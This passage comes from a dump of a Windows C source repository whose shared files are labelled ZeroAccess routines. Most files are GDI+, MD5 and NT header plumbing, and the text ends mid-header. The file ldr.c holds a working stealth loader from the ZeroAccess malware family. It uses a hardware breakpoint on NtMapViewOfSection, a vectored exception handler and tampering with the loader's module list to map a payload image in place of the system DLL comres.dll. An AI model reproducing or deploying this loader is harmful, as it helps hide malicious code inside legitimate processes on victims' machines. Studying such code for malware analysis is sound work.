"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: GDIP.C\n*\n* VERSION: 1.00\n*\n* DATE: 18 Jan 2016\n*\n* GDI+ support.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"gdip.h\"\n\nBOOL SfInitGdiPlus(\n\tVOID\n\t)\n{\n\tHANDLE hGdiPlus;\n\n\thGdiPlus = LoadLibraryEx(TEXT(\"gdiplus.dll\"), 0, LOAD_LIBRARY_SEARCH_SYSTEM32);\n\tif (hGdiPlus == NULL)\n\t\treturn FALSE;\n\n\tGdiplusStartup = (pfnGdiplusStartup)GetProcAddress(hGdiPlus, \"GdiplusStartup\");\n\tif (GdiplusStartup == NULL)\n\t\treturn FALSE;\n\n\tGdiplusShutdown = (pfnGdiplusShutdown)GetProcAddress(hGdiPlus, \"GdiplusShutdown\");\n\tif (GdiplusShutdown == NULL)\n\t\treturn FALSE;\n\n\tGdipCreateBitmapFromStream = (pfnGdipCreateBitmapFromStream)GetProcAddress(hGdiPlus, \"GdipCreateBitmapFromStream\");\n\tif (GdipCreateBitmapFromStream == NULL)\n\t\treturn FALSE;\n\n\tGdipDisposeImage = (pfnGdipDisposeImage)GetProcAddress(hGdiPlus, \"GdipDisposeImage\");\n\tif (GdipDisposeImage == NULL)\n\t\treturn FALSE;\n\n\tGdipGetImageWidth = (pfnGdipGetImageWidth)GetProcAddress(hGdiPlus, \"GdipGetImageWidth\");\n\tif (GdipGetImageWidth == NULL)\n\t\treturn FALSE;\n\n\tGdipGetImageHeight = (pfnGdipGetImageHeight)GetProcAddress(hGdiPlus, \"GdipGetImageHeight\");\n\tif (GdipGetImageHeight == NULL)\n\t\treturn FALSE;\n\n\tGdipBitmapLockBits = (pfnGdipBitmapLockBits)GetProcAddress(hGdiPlus, \"GdipBitmapLockBits\");\n\tif (GdipBitmapLockBits == NULL)\n\t\treturn FALSE;\n\n\tGdipBitmapUnlockBits = (pfnGdipBitmapUnlockBits)GetProcAddress(hGdiPlus, \"GdipBitmapUnlockBits\");\n\tif (GdipBitmapUnlockBits == NULL)\n\t\treturn FALSE;\n\n\treturn TRUE;\n}\n"
},
{
"path": "Source/shared/gdip.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: GDIP.H\n*\n* VERSION: 1.00\n*\n* DATE: 18 Jan 2016\n*\n* Common header file for GDI+.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\ntypedef enum {\n\tGdiplusOk = 0,\n\tGdiplusGenericError = 1,\n\tGdiplusInvalidParameter = 2,\n\tGdiplusOutOfMemory = 3,\n\tGdiplusObjectBusy = 4,\n\tGdiplusInsufficientBuffer = 5,\n\tGdiplusNotImplemented = 6,\n\tGdiplusWin32Error = 7,\n\tGdiplusWrongState = 8,\n\tGdiplusAborted = 9,\n\tGdiplusFileNotFound = 10,\n\tGdiplusValueOverflow = 11,\n\tGdiplusAccessDenied = 12,\n\tGdiplusUnknownImageFormat = 13,\n\tGdiplusFontFamilyNotFound = 14,\n\tGdiplusFontStyleNotFound = 15,\n\tGdiplusNotTrueTypeFont = 16,\n\tGdiplusUnsupportedGdiplusVersion = 17,\n\tGdiplusNotInitialized = 18,\n\tGdiplusPropertyNotFound = 19,\n\tGdiplusPropertyNotSupported = 20,\n\tGdiplusProfileNotFound = 21\n} GDI_STATUS;\n\ntypedef struct _GdiplusStartupInput {\n\tUINT32 GdiplusVersion;\n\tPVOID DebugEventCallback;\n\tBOOL SuppressBackgroundThread;\n\tBOOL SuppressExternalCodecs;\n} GdiplusStartupInput, *PGdiplusStartupInput;\n\ntypedef struct _GdiplusStartupOutput {\n\tPVOID NotificationHook;\n\tPVOID NotificationUnhook;\n} GdiplusStartupOutput, *PGdiplusStartupOutput;\n\ntypedef struct _GdiPlusRect {\n\tINT X;\n\tINT Y;\n\tINT Width;\n\tINT Height;\n} GdiPlusRect, *PGdiPlusRect;\n\ntypedef struct _GdiPlusBitmapData {\n\tUINT Width;\n\tUINT Height;\n\tINT Stride;\n\tUINT PixelFormat;\n\tVOID* Scan0;\n\tUINT_PTR Reserved;\n} GdiPlusBitmapData, *PGdiPlusBitmapData;\n\ntypedef GDI_STATUS(WINAPI *pfnGdiplusStartup)(\n\t_Out_ ULONG_PTR *token,\n\t_In_ const GdiplusStartupInput *input,\n\t_Out_ GdiplusStartupOutput *output\n\t);\n\ntypedef void (WINAPI *pfnGdiplusShutdown)(\n\t_In_ ULONG_PTR token\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipCreateBitmapFromStream)(\n\tIStream* stream,\n\tvoid **bitmap\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipGetImageWidth)(\n\tvoid *image,\n\tUINT *width\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipGetImageHeight)(\n\tvoid *image,\n\tUINT *height\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipDisposeImage)(\n\tvoid *image\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipBitmapLockBits)(\n\tvoid* bitmap,\n\tCONST GdiPlusRect* rect,\n\tUINT flags,\n\tINT format,\n\tvoid* lockedBitmapData\n\t);\n\ntypedef GDI_STATUS(WINAPI *pfnGdipBitmapUnlockBits)(\n\tvoid* bitmap,\n\tvoid* lockedBitmapData\n\t);\n\ntypedef enum\n{\n\tImageLockModeRead = 0x0001,\n\tImageLockModeWrite = 0x0002,\n\tImageLockModeUserInputBuf = 0x0004\n} ImageLockMode;\n\n#define PixelFormatIndexed 0x00010000 // Indexes into a palette\n#define PixelFormatGDI 0x00020000 // Is a GDI-supported format\n#define PixelFormatAlpha 0x00040000 // Has an alpha component\n#define PixelFormatPAlpha 0x00080000 // Pre-multiplied alpha\n#define PixelFormatExtended 0x00100000 // Extended color 16 bits/channel\n#define PixelFormatCanonical 0x00200000 \n#define PixelFormatUndefined 0\n#define PixelFormatDontCare 0\n#define PixelFormat1bppIndexed (1 | ( 1 << 8) | PixelFormatIndexed | PixelFormatGDI)\n#define PixelFormat4bppIndexed (2 | ( 4 << 8) | PixelFormatIndexed | PixelFormatGDI)\n#define PixelFormat8bppIndexed (3 | ( 8 << 8) | PixelFormatIndexed | PixelFormatGDI)\n#define PixelFormat16bppGrayScale (4 | (16 << 8) | PixelFormatExtended)\n#define PixelFormat16bppRGB555 (5 | (16 << 8) | PixelFormatGDI)\n#define PixelFormat16bppRGB565 (6 | (16 << 8) | PixelFormatGDI)\n#define PixelFormat16bppARGB1555 (7 | (16 << 8) | PixelFormatAlpha | PixelFormatGDI)\n#define PixelFormat24bppRGB (8 | (24 << 8) | PixelFormatGDI)\n#define PixelFormat32bppRGB (9 | (32 << 8) | PixelFormatGDI)\n#define PixelFormat32bppARGB (10 | (32 << 8) | PixelFormatAlpha | PixelFormatGDI | PixelFormatCanonical)\n#define PixelFormat32bppPARGB (11 | (32 << 8) | PixelFormatAlpha | PixelFormatPAlpha | PixelFormatGDI)\n#define PixelFormat48bppRGB (12 | (48 << 8) | PixelFormatExtended)\n#define PixelFormat64bppARGB (13 | (64 << 8) | PixelFormatAlpha | PixelFormatCanonical | PixelFormatExtended)\n#define PixelFormat64bppPARGB (14 | (64 << 8) | PixelFormatAlpha | PixelFormatPAlpha | PixelFormatExtended)\n#define PixelFormat32bppCMYK (15 | (32 << 8))\n#define PixelFormatMax 16\n\npfnGdiplusStartup GdiplusStartup;\npfnGdiplusShutdown GdiplusShutdown;\npfnGdipCreateBitmapFromStream GdipCreateBitmapFromStream;\npfnGdipDisposeImage GdipDisposeImage;\npfnGdipGetImageWidth GdipGetImageWidth;\npfnGdipGetImageHeight GdipGetImageHeight;\npfnGdipBitmapLockBits GdipBitmapLockBits;\npfnGdipBitmapUnlockBits GdipBitmapUnlockBits;\n\nBOOL SfInitGdiPlus(\n\tVOID\n\t);\n"
},
{
"path": "Source/shared/global.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: GLOBAL.H\n*\n* VERSION: 1.01\n*\n* DATE: 19 Jan 2016\n*\n* Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n//disable nonmeaningful warnings.\n#pragma warning(disable: 4005) // macro redefinition\n#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 6102) // Using %s from failed function call at line %u\n#pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#if (_MSC_VER >= 1900) \n#ifdef _DEBUG\n#pragma comment(lib, \"vcruntimed.lib\")\n#pragma comment(lib, \"ucrtd.lib\")\n#else\n#pragma comment(lib, \"libvcruntime.lib\")\n#endif\n#endif\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \"..\\minirtl\\minirtl.h\"\n#include \"..\\minirtl\\rtltypes.h\"\n#include \"..\\minirtl\\_filename.h\"\n#include \"..\\minirtl\\cmdline.h\"\n\n#include \"ntos.h\"\n#include \"za.h\"\n#include \"util.h\"\n#include \"md5.h\"\n#include \"za_crypto.h\"\n#include \"ldr.h\"\n#include \"rc4.h\"\n"
},
{
"path": "Source/shared/ldr.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: LDR.C\n*\n* VERSION: 1.00\n*\n* DATE: 15 Jan 2016\n*\n* ZeroAccess loader routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\nTEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, \"_\" };\nPVOID g_pNtMapViewOfSection = NULL;\n\ntypedef struct _ZA_THREAD_CTX {\n\tTEB_ACTIVE_FRAME Frame;\n\tIMAGE_NT_HEADERS *fHeader;\n\tULONG_PTR ReturnAddress; \n\tULONG_PTR PayloadImageBase;\n\tULONG_PTR ViewBase;\n} ZA_THREAD_CTX, *PZA_THREAD_CTX;\n\n/*\n* SfLdrQueryResourceDataEx\n*\n* Purpose:\n*\n* Manually parse resource directory and load resource by given id.\n*\n*/\nPBYTE SfLdrQueryResourceDataEx(\n\t_In_ PVOID ImageBase,\n\t_In_ CONST LDR_RESOURCE_INFO* ResourceIdPath,\n\t_Out_ ULONG *DataSize\n\t)\n{\n\tBOOL cond = FALSE, bFound = FALSE;\n\tIMAGE_RESOURCE_DIRECTORY *ResRoot, *ResDir;\n\tIMAGE_RESOURCE_DIRECTORY_ENTRY *ResourceEntry = NULL;\n\tIMAGE_RESOURCE_DATA_ENTRY *ResData;\n\tWORD NumberOfIdEntries;\n\tULONG Size;\n\tPBYTE Data;\n\tIMAGE_NT_HEADERS *NtHeaders;\n\n\tif (DataSize) {\n\t\t*DataSize = 0;\n\t}\n\n\tData = NULL;\n\n\tdo {\n\n\t\tResRoot = (PIMAGE_RESOURCE_DIRECTORY)RtlImageDirectoryEntryToData(ImageBase, FALSE, IMAGE_DIRECTORY_ENTRY_RESOURCE, &Size);\n\t\tif (ResRoot == NULL)\n\t\t\tbreak;\n\n\t\tNumberOfIdEntries = ResRoot->NumberOfIdEntries;\n\t\tif (NumberOfIdEntries == 0)\n\t\t\tbreak;\n\n\t\tbFound = FALSE;\n\t\tdo {\n\t\t\tResourceEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PCHAR)ResRoot + sizeof(IMAGE_RESOURCE_DIRECTORY));\n\t\t\tif (ResourceEntry->Id == ResourceIdPath->Type) {\n\t\t\t\tbFound = TRUE;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tResourceEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PCHAR)ResourceEntry + sizeof(IMAGE_RESOURCE_DIRECTORY));\n\t\t\tNumberOfIdEntries--;\n\n\t\t} while (NumberOfIdEntries != 0);\n\n\t\tif (bFound == FALSE)\n\t\t\tbreak;\n\n\t\tif ((ULONG_PTR)ResourceEntry > ((ULONG_PTR)ResRoot + Size))\n\t\t\tbreak;\n\n\t\tif (ResourceEntry->OffsetToData & 0x80000000) {\n\t\t\tResDir = (PIMAGE_RESOURCE_DIRECTORY)((PUCHAR)ResRoot + (ResourceEntry->OffsetToData & 0x7FFFFFFF));\n\t\t\tif ((ULONG_PTR)ResDir > ((ULONG_PTR)ResRoot + Size))\n\t\t\t\tbreak;\n\n\t\t\tNumberOfIdEntries = ResDir->NumberOfIdEntries;\n\t\t\tif (NumberOfIdEntries == 0)\n\t\t\t\tbreak;\n\n\t\t\tResourceEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PUCHAR)ResDir + sizeof(IMAGE_RESOURCE_DIRECTORY));\n\t\t\tif ((ULONG_PTR)ResourceEntry > ((ULONG_PTR)ResRoot + Size))\n\t\t\t\tbreak;\n\n\t\t\tbFound = FALSE;\n\n\t\t\tdo {\n\n\t\t\t\tif (ResourceEntry->Name == ResourceIdPath->Name) {\n\t\t\t\t\tbFound = TRUE;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\n\t\t\t\tResourceEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PCHAR)ResourceEntry + sizeof(IMAGE_RESOURCE_DIRECTORY_ENTRY));\n\t\t\t\tNumberOfIdEntries--;\n\n\t\t\t} while (NumberOfIdEntries != 0);\n\n\t\t\tif (bFound == FALSE)\n\t\t\t\tbreak;\n\n\t\t\tif (ResourceEntry->OffsetToData & 0x80000000) {\n\t\t\t\tResDir = (PIMAGE_RESOURCE_DIRECTORY)((PUCHAR)ResRoot + (ResourceEntry->OffsetToData & 0x7FFFFFFF));\n\t\t\t\tif (ResDir->NumberOfIdEntries == 0)\n\t\t\t\t\tbreak;\n\t\t\t\tResourceEntry = (PIMAGE_RESOURCE_DIRECTORY_ENTRY)((PUCHAR)ResDir + sizeof(IMAGE_RESOURCE_DIRECTORY));\n\t\t\t}\n\n\t\t\tif ((ULONG_PTR)ResourceEntry > ((ULONG_PTR)ResRoot + Size))\n\t\t\t\tbreak;\n\n\t\t\tif (ResourceEntry) {\n\t\t\t\tResData = (PIMAGE_RESOURCE_DATA_ENTRY)((PUCHAR)ResRoot + ResourceEntry->OffsetToData);\n\n\t\t\t\tNtHeaders = RtlImageNtHeader(ImageBase);\n\t\t\t\tData = RtlAddressInSectionTable(NtHeaders, ImageBase, ResData->OffsetToData);\n\t\t\t\tif (DataSize) {\n\t\t\t\t\t*DataSize = ResData->Size;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t} while (cond);\n\n\treturn Data;\n}\n\n/*\n* SfLdrQueryResourceData\n*\n* Purpose:\n*\n* Load resource by given id (win32 FindResource, SizeofResource, LockResource).\n*\n*/\nPBYTE SfLdrQueryResourceData(\n\t_In_ ULONG_PTR ResourceId,\n\t_In_ PVOID DllHandle,\n\t_In_ PULONG DataSize\n\t)\n{\n\tNTSTATUS status;\n\tULONG_PTR IdPath[3];\n\tIMAGE_RESOURCE_DATA_ENTRY *DataEntry;\n\tPBYTE Data = NULL;\n\tULONG SizeOfData = 0;\n\n\tif (DllHandle != NULL) {\n\n\t\tIdPath[0] = (ULONG_PTR)RT_RCDATA; //type\n\t\tIdPath[1] = ResourceId; //id\n\t\tIdPath[2] = 0; //lang\n\n\t\tstatus = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);\n\t\tif (NT_SUCCESS(status)) {\n\t\t\tstatus = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);\n\t\t\tif (NT_SUCCESS(status)) {\n\t\t\t\tif (DataSize) {\n\t\t\t\t\t*DataSize = SizeOfData;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn Data;\n}\n\n//mechanism 8\n\n\nVOID NTAPI SfLdrEnumModules(\n\t_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,\n\t_In_ PVOID Context,\n\t_In_ OUT BOOLEAN *StopEnumeration\n\t)\n{\n\tPUNICODE_STRING uDllName = (PUNICODE_STRING)Context;\n\n\tif (uDllName) {\n\t\tif (RtlEqualUnicodeString(&DataTableEntry->BaseDllName, uDllName, TRUE)) {\n\t\t\tDataTableEntry->BaseDllName.Length |= 1;\n\t\t\tDataTableEntry->BaseDllName.Buffer[1]++;\n\t\t}\n\t}\n\telse {\n\n\t\tif (DataTableEntry->BaseDllName.Length & 1) {\n\t\t\tDataTableEntry->BaseDllName.Length &= ~1;\n\t\t\tDataTableEntry->BaseDllName.Buffer[1]--;\n\t\t}\n\t}\n\t*StopEnumeration = 0;\n}\n\nLONG NTAPI SfLdrVehHandler(\n\tEXCEPTION_POINTERS *ExceptionInfo\n\t)\n{\n\tLPWSTR DllString;\n\tPZA_THREAD_CTX ZACtx = NULL;\n\tSIZE_T *ViewSize;\n\n\tif (\n\t\t(ExceptionInfo->ExceptionRecord->ExceptionCode != STATUS_SINGLE_STEP) ||\n\t\t(ExceptionInfo->ExceptionRecord->ExceptionAddress != g_pNtMapViewOfSection)\n\t\t)\n\t{\n\t\treturn EXCEPTION_CONTINUE_SEARCH;\n\t}\n\n\tDllString = _filename_w((LPWSTR)NtCurrentTeb()->NtTib.ArbitraryUserPointer);\n\tif (_strcmpi_w(DllString, L\"comres.dll\") == 0) {\n\n\t\tZACtx = (PZA_THREAD_CTX)RtlGetFrame();\n\t\twhile ((ZACtx != NULL) && (ZACtx->Frame.Context != &g_fctx)) {\n\t\t\tZACtx = (PZA_THREAD_CTX)ZACtx->Frame.Previous;\n\t\t}\n\n\t\tif (ZACtx) {\n\n#ifdef _WIN64\n\t\t\tZACtx->ReturnAddress = *(ULONG_PTR *)ExceptionInfo->ContextRecord->Rsp;\n\t\t\tZACtx->ViewBase = (ULONG_PTR)ExceptionInfo->ContextRecord->R8;\n\n\t\t\tViewSize = (PSIZE_T)*(PSIZE_T)(ExceptionInfo->ContextRecord->Rsp + 0x38);\n\t\t\t*ViewSize = ZACtx->fHeader->OptionalHeader.SizeOfImage;\n\n\t\t\t//*(ULONG_PTR *)ExceptionInfo->ContextRecord->Rsp = (ULONG_PTR)&SfpLdrPostCallHandler;\n#else\n\t\t\tZACtx->ReturnAddress = *(ULONG_PTR *)ExceptionInfo->ContextRecord->Esp;\n\t\t\tZACtx->ViewBase = *(PULONG_PTR)(ExceptionInfo->ContextRecord->Esp + 0xc);\n\n\t\t\tViewSize = (PSIZE_T)*(PSIZE_T)(ExceptionInfo->ContextRecord->Esp + 0x1c);\n\t\t\t*ViewSize = ZACtx->fHeader->OptionalHeader.SizeOfImage;\n\n\t\t\t//*(ULONG_PTR *)ExceptionInfo->ContextRecord->Esp = (ULONG_PTR)&SfpLdrPostCallHandler;\n#endif\n\t\t}\n\t}\n\n\tif (\n\t\t(USER_SHARED_DATA->NtMajorVersion < 6) &&\n\t\t(USER_SHARED_DATA->NtMinorVersion < 2)\n\t\t)\n\t{\n\t\tExceptionInfo->ContextRecord->Dr3 = 0;\n\t}\n\tExceptionInfo->ContextRecord->EFlags |= 0x10000;\n\treturn EXCEPTION_CONTINUE_EXECUTION;\n}\n\nVOID SfLdrLoadPayload(\n\tPVOID PayloadImageBase\n\t)\n{\n\tCONTEXT ctx;\n\tNTSTATUS status;\n\tPVOID ExceptionHandler, DllImageBase = NULL;\n\tDWORD_PTR ArbitraryUserPointer = 0;\n\tUNICODE_STRING DllName;\n#ifdef _DEBUG\n\tANSI_STRING str;\n#endif\n\tZA_THREAD_CTX zactx;\n\n\tRtlSecureZeroMemory(&zactx, sizeof(zactx));\n\tzactx.Frame.Context = &g_fctx;\n\tzactx.Frame.Flags = 0;\n\tzactx.PayloadImageBase = (ULONG_PTR)PayloadImageBase;\n\n\tRtlPushFrame((PTEB_ACTIVE_FRAME)&zactx);\n\n\tzactx.fHeader = RtlImageNtHeader(PayloadImageBase);\n\tif (zactx.fHeader) {\n\t\tExceptionHandler = RtlAddVectoredExceptionHandler(1, &SfLdrVehHandler);\n\t\tif (ExceptionHandler) {\n\n#ifdef _DEBUG\n\t\t\tRtlSecureZeroMemory(&DllName, sizeof(DllName));\n\t\t\tRtlInitUnicodeString(&DllName, L\"ntdll.dll\");\n\t\t\tif (NT_SUCCESS(LdrGetDllHandle(NULL, NULL, &DllName, &DllImageBase))) {\n\t\t\t\tRtlInitString(&str, \"NtMapViewOfSection\");\n\t\t\t\tLdrGetProcedureAddress(DllImageBase, &str, 0, &g_pNtMapViewOfSection);\n\t\t\t}\n#else\n\t\t\tg_pNtMapViewOfSection = NtMapViewOfSection;\n#endif\n\n\t\t\tRtlSecureZeroMemory(&ctx, sizeof(CONTEXT));\n\t\t\tctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;\n\t\t\tctx.Dr3 = (DWORD_PTR)g_pNtMapViewOfSection;\n\t\t\tctx.Dr7 = 0x440;\n\n\t\t\tif (NT_SUCCESS(NtSetContextThread(NtCurrentThread(), &ctx))) {\n\n\t\t\t\tRtlInitUnicodeString(&DllName, L\"comres.dll\");\n\n\t\t\t\tLdrEnumerateLoadedModules(0, &SfLdrEnumModules, (PVOID)&DllName);\n\n//save and zero NtTib.ArbitraryUserPointer\n#ifdef _WIN64\n\t\t\t\tArbitraryUserPointer = (DWORD_PTR)__readgsqword(0x28);\n\t\t\t\t__writegsqword(0x28, 0);\n#else\n\t\t\t\tArbitraryUserPointer = (DWORD_PTR)__readfsdword(0x14);\n\t\t\t\t__writefsdword(0x14, 0);\n#endif\n\t\t\t\tstatus = LdrLoadDll(NULL, NULL, &DllName, &DllImageBase);\n\n//restore NtTib.ArbitraryUserPointer\n#ifdef _WIN64\n\t\t\t\t__writegsqword(0x28, ArbitraryUserPointer);\n#else\n\t\t\t\t__writefsdword(0x14, ArbitraryUserPointer);\n#endif\n\t\t\t\tLdrEnumerateLoadedModules(0, &SfLdrEnumModules, NULL);\n\n\t\t\t\tctx.Dr3 = 0;\n\t\t\t\tctx.Dr7 = 0x400;\n\t\t\t\tNtSetContextThread(NtCurrentThread(), &ctx);\n\t\t\t}\n\t\t\tRtlRemoveVectoredExceptionHandler(ExceptionHandler);\n\t\t}\n\t}\n\tRtlPopFrame((PTEB_ACTIVE_FRAME)&zactx);\n}\n"
},
{
"path": "Source/shared/ldr.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: LDR.H\n*\n* VERSION: 1.00\n*\n* DATE: 15 Jan 2016\n*\n* Common header file for ZeroAccess loader routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\nPBYTE SfLdrQueryResourceDataEx(\n\t_In_ PVOID ImageBase,\n\t_In_ CONST LDR_RESOURCE_INFO* ResourceIdPath,\n\t_Out_ ULONG *DataSize\n\t);\n\nPBYTE SfLdrQueryResourceData(\n\t_In_ ULONG_PTR ResourceId,\n\t_In_ PVOID DllHandle,\n\t_In_ PULONG DataSize\n\t);\n"
},
{
"path": "Source/shared/md5.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: MD5.C\n*\n* VERSION: 1.00\n*\n* DATE: 15 Jan 2016\n*\n* ZeroAccess Fast MD5 support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\nPMD5Init MD5Init = NULL;\nPMD5Update MD5Update = NULL;\nPMD5Final MD5Final = NULL;\n\n/*\n* SfInitMD5\n*\n* Purpose:\n*\n* Load function pointers for quick MD5.\n*\n*/\nBOOLEAN SfInitMD5(\n\tVOID\n\t)\n{\n\tHMODULE hLib;\n\t\t\n\tif (\n\t\t(MD5Init != NULL) &&\n\t\t(MD5Update != NULL) &&\n\t\t(MD5Final != NULL)\n\t\t)\n\t{\n\t\treturn TRUE;\n\t}\n\t\t\n\thLib = GetModuleHandle(TEXT(\"ntdll.dll\"));\n\tif (hLib == NULL)\n\t\treturn FALSE;\n\n\tMD5Init = (PMD5Init)GetProcAddress(hLib, \"MD5Init\");\n\tMD5Update = (PMD5Update)GetProcAddress(hLib, \"MD5Update\");\n\tMD5Final = (PMD5Final)GetProcAddress(hLib, \"MD5Final\");\n\treturn TRUE;\n}\n"
},
{
"path": "Source/shared/md5.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016\n*\n* TITLE: MD5.H\n*\n* VERSION: 1.00\n*\n* DATE: 15 Jan 2016\n*\n* ZeroAccess MD5 support header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\ntypedef struct {\n\tULONG i[2];\n\tULONG buf[4];\n\tunsigned char in[64];\n\tunsigned char digest[16];\n} MD5_CTX;\n\ntypedef VOID(WINAPI *PMD5Init) (MD5_CTX *context);\ntypedef VOID(WINAPI *PMD5Update)(MD5_CTX *context, const unsigned char *input, unsigned int inlen);\ntypedef VOID(WINAPI *PMD5Final) (MD5_CTX *context);\n\nextern PMD5Init MD5Init;\nextern PMD5Update MD5Update;\nextern PMD5Final MD5Final;\n\nBOOLEAN SfInitMD5(\n\tVOID\n\t);\n"
},
{
"path": "Source/shared/ntos.h",
"content": "/************************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015, translated from Microsoft sources/debugger\n*\n* TITLE: NTOS.H\n*\n* VERSION: 1.32\n*\n* DATE: 30 Jan 2016\n*\n* Common header file for the ntos API functions and definitions.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n************************************************************************************/\n\n#pragma comment(lib, \"ntdll.lib\")\n\n#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int\n\n#define IN_REGION(x, Base, Size) (((ULONG_PTR)x >= (ULONG_PTR)Base) && ((ULONG_PTR)x <= (ULONG_PTR)Base + (ULONG_PTR)Size))\n\n#define ALIGN_DOWN(count,size) \\\n ((ULONG_PTR)(count) & ~((ULONG_PTR)(size) - 1))\n\n#define ALIGN_UP(count,size) \\\n (ALIGN_DOWN( (ULONG_PTR)(count)+(ULONG_PTR)(size)-1, (ULONG_PTR)(size) ))\n\n//Access Rights\n\n#define CALLBACK_MODIFY_STATE 0x0001\n#define CALLBACK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|CALLBACK_MODIFY_STATE )\n\n#define DEBUG_READ_EVENT (0x0001)\n#define DEBUG_PROCESS_ASSIGN (0x0002)\n#define DEBUG_SET_INFORMATION (0x0004)\n#define DEBUG_QUERY_INFORMATION (0x0008)\n#define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|DEBUG_READ_EVENT|DEBUG_PROCESS_ASSIGN|\\\n DEBUG_SET_INFORMATION|DEBUG_QUERY_INFORMATION)\n\n#define DIRECTORY_QUERY (0x0001)\n#define DIRECTORY_TRAVERSE (0x0002)\n#define DIRECTORY_CREATE_OBJECT (0x0004)\n#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008)\n#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF)\n\n#define EVENT_QUERY_STATE 0x0001\n#define EVENT_MODIFY_STATE 0x0002 \n#define EVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) \n\n#define EVENT_PAIR_ALL_ACCESS 